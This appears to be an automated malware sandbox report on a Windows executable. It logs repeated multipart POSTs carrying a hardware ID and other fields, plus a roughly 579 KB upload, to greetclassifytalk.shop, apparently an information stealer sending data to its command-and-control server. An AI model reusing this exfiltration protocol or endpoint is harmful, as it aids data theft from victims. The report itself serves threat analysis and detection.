                                                                            2024-04-20 17:21:00 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 31 46 33 38 30 39 32 31 37 35 42 43 38 30 38 45 36 36 35 38 39 33 37 41 44 34 46 31 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4D1F38092175BC808E6658937AD4F1B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                                            2024-04-20 17:21:00 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                            2024-04-20 17:21:00 UTC802INHTTP/1.1 200 OK
                                                                            Date: Sat, 20 Apr 2024 17:21:00 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=tuuemb8rqm6a26o4qbimv3hthd; expires=Wed, 14-Aug-2024 11:07:39 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P3tlIfc22yN%2F9nwVq1ObuWuydqlL6AozMnCUWgNbeDTAqXjLa7Ufs6f9QuJJ%2FqlTM5Uj2gvIq1HPxMq2MYRWXODcWuMYwpWw4uASo0WnVdNFZ2V4duNwD3JkEiMCdXLB15wVCZpWrRgC"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8776cee9dc9c453d-ATL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-04-20 17:21:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                            Data Ascii: fok 81.181.57.52
                                                                            2024-04-20 17:21:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.449735172.67.177.984436816C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-20 17:21:01 UTC287OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 7079
                                                                            Host: greetclassifytalk.shop
                                                                            2024-04-20 17:21:01 UTC7079OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 31 46 33 38 30 39 32 31 37 35 42 43 38 30 38 45 36 36 35 38 39 33 37 41 44 34 46 31 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4D1F38092175BC808E6658937AD4F1B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                                            2024-04-20 17:21:02 UTC804INHTTP/1.1 200 OK
                                                                            Date: Sat, 20 Apr 2024 17:21:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=205p50ecvr1ug9o1l42as7jr7q; expires=Wed, 14-Aug-2024 11:07:40 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nrXCX%2BNYzeMDiynxpil8jFfhX83pmkkBvne5JrWkIS%2FKIrp1L5pIfpTOeHTiXJdfN3P32ArwteATSHiaRSfZgK4lCVyhWn5UmF1KKs8%2F0XdpoMTqEcEyauKJ0S3IkDMFBdW1WkPkE1LM"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8776cef0f86b453e-ATL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-04-20 17:21:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                            Data Ascii: fok 81.181.57.52
                                                                            2024-04-20 17:21:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449736172.67.177.984436816C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-20 17:21:02 UTC287OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1389
                                                                            Host: greetclassifytalk.shop
                                                                            2024-04-20 17:21:02 UTC1389OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 31 46 33 38 30 39 32 31 37 35 42 43 38 30 38 45 36 36 35 38 39 33 37 41 44 34 46 31 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4D1F38092175BC808E6658937AD4F1B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                                            2024-04-20 17:21:02 UTC804INHTTP/1.1 200 OK
                                                                            Date: Sat, 20 Apr 2024 17:21:02 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=jc7228mb4mv7c293djh20cnbln; expires=Wed, 14-Aug-2024 11:07:41 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dkGbJqUUJjj1ehPEXr%2Be0SUF84qqcrxS6FHoes30ikMZGqRcDEs7uDSqEas84ml1CjXV8K9VOGccYGBHmJEx%2FBhZgDITJAeQcfm6TLldzhtgfrth6bdtV%2FVmd9b7PFIj6Abzhdb4jkTd"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8776cef5ee51457b-ATL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-04-20 17:21:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                            Data Ascii: fok 81.181.57.52
                                                                            2024-04-20 17:21:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.449737172.67.177.984436816C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-20 17:21:03 UTC289OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 579140
                                                                            Host: greetclassifytalk.shop
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 31 46 33 38 30 39 32 31 37 35 42 43 38 30 38 45 36 36 35 38 39 33 37 41 44 34 46 31 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4D1F38092175BC808E6658937AD4F1B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: a1 8a ad 59 2d e5 52 d4 38 04 06 b0 a7 74 50 73 f2 bb 92 77 b7 f2 79 b7 04 76 96 0d 36 14 6f ed a6 7d 77 6c 34 6c 07 9c a4 8b df d8 84 ec 07 bd 38 71 ad 38 5c 19 41 ae 04 a5 db e1 cc d3 38 b5 73 2e f5 19 68 dc 15 f0 c5 ed be 94 81 61 dc 2c a7 f9 ea 71 fb 61 28 5e d0 1b 1f 26 6e d6 66 c1 d8 0b 9b 22 92 e1 c3 11 b4 f9 cf 07 a3 14 88 1c 73 6c 64 14 15 79 95 f0 22 c5 52 9e da bb 6c 0e c7 f6 c1 21 7c 3c 3b 42 28 2d 24 9c c0 ba 1d a5 f6 f9 c6 a8 4d bc ea a8 cc ab ef b6 0e a6 15 39 0e 6e 90 a3 d2 c2 fb ef f6 85 c8 09 6f fe e7 89 3b 3f a0 38 1a 55 73 a7 fa f0 41 f1 7f aa 99 60 1a 8c 4f f5 5a 91 63 43 13 b9 f6 61 ee aa 70 d2 5b c3 37 ef 09 cb a3 ff b5 9f bb be b9 72 45 47 76 30 76 ac 9b 33 b9 93 c8 3c 58 dd 0e 55 2d 49 cb 51 39 fb 7b 83 b7 77 d3 dc e0 c0 de 5b 79
                                                                            Data Ascii: Y-R8tPswyv6o}wl4l8q8\A8s.ha,qa(^&nf"sldy"Rl!|<;B(-$M9no;?8UsA`OZcCap[7rEGv0v3<XU-IQ9{w[y
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: 38 cd 6d db 20 d2 2c 91 e0 83 21 a2 96 b4 e7 96 ae 88 cf 45 29 76 9a c1 55 1d 6e 84 d9 d7 3c 04 e6 cc c6 f8 27 0e 3f fb 78 24 bd b8 53 6b 67 e6 34 39 a3 49 9d c7 f8 a3 78 e5 82 48 c6 b0 e5 86 f1 64 56 3b bb 29 e8 cf e7 59 88 7a 31 c2 c5 25 73 75 96 6d 5f 68 c8 c4 16 b2 ed 65 70 47 fb 82 95 6b b6 1e 6a fd 9e 3e 32 85 90 52 68 ac cc fe 02 35 1c df 79 5f 50 9f b1 dc 1a 89 57 c6 3a 35 73 88 85 d2 3a 91 28 55 3e f2 8f 92 49 9b eb ca 55 03 8d 36 96 cb a0 0d d5 8e 97 71 4b 00 17 21 1d 21 f3 f2 93 c8 fe a3 f9 f1 99 f2 06 cd 7b dc 38 e1 a5 e5 50 01 83 63 fc f9 27 89 1c 8f 57 78 b3 50 b6 c1 8e 77 a3 0f 43 d1 37 b5 94 af e3 16 f6 f8 59 f1 25 14 47 37 df d2 be 76 22 f4 20 31 9a 73 59 04 36 d4 27 de ab d4 3f df ea fb 41 57 2d 8a 92 2c 5e e9 69 6d bc 3c 10 7e 65 c5 18
                                                                            Data Ascii: 8m ,!E)vUn<'?x$Skg49IxHdV;)Yz1%sum_hepGkj>2Rh5y_PW:5s:(U>IU6qK!!{8Pc'WxPwC7Y%G7v" 1sY6'?AW-,^im<~e
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: e4 55 57 99 f8 7a 75 48 94 da b3 e8 02 3e 70 05 d2 64 cc 2a 08 e4 03 c9 67 86 cf ba 48 e4 c4 5f 20 7f 8c 80 be 76 b2 36 f3 98 c5 0a 66 9b d4 93 a5 fb 4f bb 4f c4 19 50 12 f8 46 59 16 ab 7f 4d 30 63 2a ac 4b f6 ba 47 46 f0 11 f5 37 3b d8 bd 07 64 b9 ed 28 70 5e 7d 7c 54 e5 c5 fb e7 d8 f1 87 fc d7 05 c9 ba 10 be 8a 2c 88 d4 a9 53 f5 5b 37 f3 3c c0 3d a6 e9 03 8b e7 3b 11 90 1c 34 7e ee 0e 64 7f f5 90 43 c3 c5 0b 37 77 6f 42 3f 68 7e 5c fa 98 72 ac 6a 13 ca 3a 9d db 08 71 5f 59 db f1 37 c4 60 5f 29 91 fa ab 8f 49 b4 4b 53 f0 19 0b 16 d9 f2 4f 21 52 19 e5 33 0c bd 23 90 9b 2a 8a bf 19 ff 7d 4a 2a eb e0 67 c0 08 0e b3 16 e4 39 7f db 01 13 f6 b9 19 ce d5 be fd 38 2c b6 64 40 8e 7a 05 4f 36 1c bd 3b f9 70 26 2c 2a b1 43 55 6e a2 6e 9b 3d bb 98 87 d4 a9 da 68 da
                                                                            Data Ascii: UWzuH>pd*gH_ v6fOOPFYM0c*KGF7;d(p^}|T,S[7<=;4~dC7woB?h~\rj:q_Y7`_)IKSO!R3#*}J*g98,d@zO6;p&,*CUnn=h
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: f8 d4 00 9c e5 a6 85 72 71 2c 54 4a 2b b1 c9 4e 89 36 f9 5b bc 60 fb ea 7d ac 36 e7 34 2a ff 3c 9d a7 a4 ed ba 6d b7 0e e2 ca 17 1a 62 23 af a9 ff dc 0b 09 3b ac cb 9d ad f8 87 92 72 07 6f c4 4d d1 66 15 96 75 34 51 95 19 8a 74 9c 32 f5 fe f6 e0 0e 19 1e ed c5 e7 2e 97 c6 0c 51 f0 03 87 d7 55 7d b9 3e d6 07 b9 a4 4e 8c 25 f4 64 d1 a1 72 b7 f9 27 da ac 1c 65 70 d3 03 71 9b 79 57 fd c2 fd b9 f6 46 db 27 4f 29 83 53 a7 73 2c c1 74 a2 b9 66 ba 46 4c 8c 17 a6 d7 1c 0b 25 18 82 0a 84 1d 03 02 1d 37 f3 da de 07 5e 8a a6 be 52 bc cf 9e ad 25 0c b9 b1 24 97 85 4e e2 fc b7 7e 20 da 98 32 c2 57 50 52 3c 2f 05 a9 14 76 ce fc dd 6a 8e 91 ed ba 8c 95 4a df c8 8b c3 95 1a 44 cf 4a 5d 3f 96 b6 85 12 77 fb 73 35 51 7c f5 b3 3b 77 c0 80 cc 2b 42 3c 38 3a 9f 63 5f fd 7e 82
                                                                            Data Ascii: rq,TJ+N6[`}64*<mb#;roMfu4Qt2.QU}>N%dr'epqyWF'O)Ss,tfFL%7^R%$N~ 2WPR</vjJDJ]?ws5Q|;w+B<8:c_~
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: e1 b9 07 46 6f 1f c1 d8 c3 8d e7 46 9e bd 8b 32 c1 e5 77 72 08 f3 f3 46 6a f8 ae ee db b3 08 f0 67 46 45 b0 d3 c3 1c cf 13 ee cb be 10 90 79 38 ae 84 ae c2 0b de 33 92 7a a2 43 25 c7 2c a7 e8 32 76 dc a2 b6 58 d9 22 e8 79 7b db 31 86 a6 0b 97 6a bd 4a a8 f2 45 ed c1 ed 20 74 4e f1 09 c8 a8 ec 5a ed 38 ef 32 b7 86 3d ed 10 82 f2 bd 38 56 1b 14 a6 bd 1b 47 cb 75 6d 35 27 7c 64 ff 1a ca f6 01 7f 14 27 52 cd 66 c1 bd 5a 82 11 27 a9 c8 c5 4f 74 4c 36 03 09 9a 9e 92 a3 c3 2b ef ec 25 75 1b cd b7 b6 82 d4 13 00 03 d1 ff 14 64 57 af fc e5 7a b2 c3 83 e4 4b 52 86 2e c2 54 da 03 af d9 d6 e3 fe 57 f6 71 71 d4 47 c1 89 5b a1 32 47 f8 01 9e 0a 32 bf c0 e4 f4 06 38 1b 09 e6 ca 79 a4 b5 a9 3a d6 5c 72 60 f2 2f fc 2f 28 e4 80 c2 47 79 46 c9 fc 3a 28 a9 9a 07 82 1a fd cf
                                                                            Data Ascii: FoF2wrFjgFEy83zC%,2vX"y{1jJE tNZ82=8VGum5'|d'RfZ'OtL6+%udWzKR.TWqqG[2G28y:\r`//(GyF:(
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: 2b 2f 1c 67 8f 00 a6 8c ba f5 89 9a f4 60 d7 37 72 95 d5 e1 3d bb 34 53 17 7a 8b 54 fa 8a dd ac 97 d7 0a c2 bc 2e 0b e0 d9 6b 35 c7 87 e9 93 b6 0f 66 2c e3 b9 cb a8 fa e1 d9 02 fb e7 67 6f 31 13 90 6a 03 15 89 f4 75 39 30 33 cc 09 65 6c fb a6 19 7e db 96 9f 8b d5 98 97 cf 38 56 70 39 9c 4c e0 40 58 97 c4 43 5e 10 d0 fa b9 68 2b 26 90 d7 07 ee b5 ce db 30 1f 3f bc af 4b d1 d4 a7 fd 5e d5 bf 65 f7 6e 43 0d 87 9a 46 2e 22 e9 7b 3b eb 4c c2 c3 71 d7 d0 2f 4e eb c3 04 7e 51 97 ef 14 ca 9d e7 0b 1b e2 4d 4f cb ff df 47 88 cf 8e 40 d4 54 32 86 cb a8 9c 3f eb 73 51 97 e4 d1 da 91 c5 cf 4a b4 33 98 9c b6 d6 ef 51 b5 18 70 b6 27 43 91 8f 7d 03 0e e9 f3 f9 3b 18 6e f9 5a 89 9f 4b 79 4d a7 e2 09 1f e8 05 12 97 e0 92 26 8b e3 04 f3 b3 9f e2 31 dc 85 22 0b 5d 13 ec 7d
                                                                            Data Ascii: +/g`7r=4SzT.k5f,go1ju903el~8Vp9L@XC^h+&0?K^enCF."{;Lq/N~QMOG@T2?sQJ3Qp'C};nZKyM&1"]}
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: 92 54 81 7a ee db ff 90 6b 83 7c 38 69 9b 87 8c 5b f6 fa 40 f1 2f 6a d4 c1 69 70 44 0a e7 48 b6 cf 4d 2d 53 cd 53 59 3f de 6b b5 1b 97 a5 c4 8d 95 89 ad df ac 51 5b 9d 12 56 88 20 b6 0b 12 2a 38 fb 5f 33 a6 71 13 21 1f fc 89 6a 0c 6a aa 99 39 1e 41 a1 f2 1a bf d1 1e 49 22 26 59 51 28 f3 e3 0f a5 b5 68 ee 47 31 05 32 50 e9 0a b3 b3 bd 51 65 41 14 b5 07 35 f1 ec 70 9c 05 72 69 34 69 e2 2e be 77 55 80 1a bb a2 90 e8 2c e6 c5 d9 a9 3e 27 46 cd 3e 63 87 73 a5 f4 cf e4 46 76 b4 e6 6b 6f cf 4b 34 9b 65 ab 50 e2 2d c3 b9 ea 76 8e d0 00 ab 19 0b 7c da 3a 46 60 d5 2c 82 40 a1 b0 28 fa ac 41 68 b5 5c d8 97 c8 e6 bf dc 1f f4 ae 19 00 45 b1 af 15 4b c1 a1 f1 ea 0b a9 07 fd d0 17 a7 b8 bb dc 50 00 8b b5 56 a9 2e e5 93 ce c7 27 ac 23 78 cd 67 36 5d cf 72 19 68 57 5a a3
                                                                            Data Ascii: Tzk|8i[@/jipDHM-SSY?kQ[V *8_3q!jj9AI"&YQ(hG12PQeA5pri4i.wU,>'F>csFvkoK4eP-v|:F`,@(Ah\EKPV.'#xg6]rhWZ
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: ab ce c6 c6 e5 ae 9d bd aa 42 57 a1 cd 13 e5 0c e4 1d cf 31 e3 46 65 c7 43 27 10 e0 b6 b9 c9 2a 3f 7d cd 34 a0 80 2f d1 8d b1 1f 26 32 de bc 83 d4 48 2b 61 67 eb 80 a4 e3 2e 52 75 59 f5 04 63 98 23 44 38 48 0b 36 ef 91 a3 69 41 f4 a5 63 07 b0 b2 ee b0 d5 dd 47 d3 c2 47 c2 65 12 ca f3 d3 96 1d 4a 07 f9 45 27 9a 76 c6 7f 3d 20 7d e3 62 52 25 17 8b 7a 61 65 0f 91 dc b8 43 23 f9 d7 fb 23 c0 0a 58 9b 37 1a 18 c9 f8 68 de d6 94 b0 4f 59 71 36 fd dd 36 8d 25 c6 06 e3 1d 02 41 c2 78 92 d9 3f d7 a8 c6 2a 58 0e a5 fd df d0 fe a7 4e 9d c9 df 5c 5a 41 27 9a 6f 05 0b 82 7d ab c2 cd 2a 8d e7 68 86 1e c2 ba 34 15 77 e8 2a 84 7e 5a 07 a8 93 a3 1d ea 3a 23 75 5e 42 02 ea 8d e6 4e 56 86 cd e7 47 d7 ed e8 aa 83 06 eb 29 db bd 63 dd 92 dd f5 79 96 4b 05 28 aa b3 8d b9 b4 a4
                                                                            Data Ascii: BW1FeC'*?}4/&2H+ag.RuYc#D8H6iAcGGeJE'v= }bR%zaeC##X7hOYq66%Ax?*XN\ZA'o}*h4w*~Z:#u^BNVG)cyK(
                                                                            2024-04-20 17:21:03 UTC15331OUTData Raw: 7d 61 3f 11 5e 6a b5 4e 3b b7 69 c1 68 a5 8a 8d 07 a3 7d ad 85 75 19 2a 59 99 f1 30 c7 1c be 0f 58 5f 6b 2f f9 6f e5 b2 e4 e0 95 df c9 20 91 76 8c df 54 8a dc a9 40 07 84 67 59 9a c3 cc 84 11 c1 6f 8e 12 02 84 9b 46 11 a5 bb 20 68 59 0d 68 ed 12 7c d9 c9 bd e4 a7 0a 7e 57 07 ae ab e0 43 bb de 70 47 89 c6 ac 19 de 8f 0a 4d 6e 4f 85 a7 29 22 6d 99 98 fe 78 81 38 30 3d 55 33 dc 6f 10 b8 cc 32 7f 4c 60 68 64 06 70 86 d6 bf f4 7b 6c 62 78 2a bf 62 33 37 1f 56 b1 3f 76 0f e8 34 7f f5 15 6e ab f9 a0 5d 33 7f 90 f5 eb dd 52 7f 25 71 26 93 46 30 86 f4 64 e6 cf b5 08 f4 ef 13 7f 82 03 cc 62 e2 3c 2b c8 6f a8 7c ee 60 d9 7c d0 88 29 a2 ff 4b d8 62 ce 31 af 2a 30 1f 4f 15 6a 3e e2 99 5c b5 a2 e9 e2 ab e0 71 38 f0 b1 39 af cc bb 63 27 57 a6 6c 62 6a 67 79 bc 1d 75 a4
                                                                            Data Ascii: }a?^jN;ih}u*Y0X_k/o vT@gYoF hYh|~WCpGMnO)"mx80=U3o2L`hdp{lbx*b37V?v4n]3R%q&F0db<+o|`|)Kb1*0Oj>\q89c'Wlbjgyu
                                                                            2024-04-20 17:21:05 UTC802INHTTP/1.1 200 OK
                                                                            Date: Sat, 20 Apr 2024 17:21:05 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=m34o9qnekmdte97e1jsdjbecsg; expires=Wed, 14-Aug-2024 11:07:44 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmQNqHTW11sb8ONS7bAF7HXy5wA3biIxJ4zZNdywqjV%2FdbhegU%2FRGj1JwYeINpsnxQzqEShVNYXaZrVCgHNenXUGqRsYG3o3MQ1WzcFvUheEa78mwLIHNgyR0gpCLAZ1fxVrE0T4zfJT"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8776cefebd7c07da-ATL
                                                                            alt-svc: h3=":443"; ma=86400


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Target ID:0
                                                                            Start time:19:20:54
                                                                            Start date:20/04/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0xfa0000
                                                                            File size:5'747'200 bytes
                                                                            MD5 hash:0B4AD1C3B3F364C3D79FABDB47FE3385
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:12.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:9.2%
                                                                              Total number of Nodes:694
                                                                              Total number of Limit Nodes:20
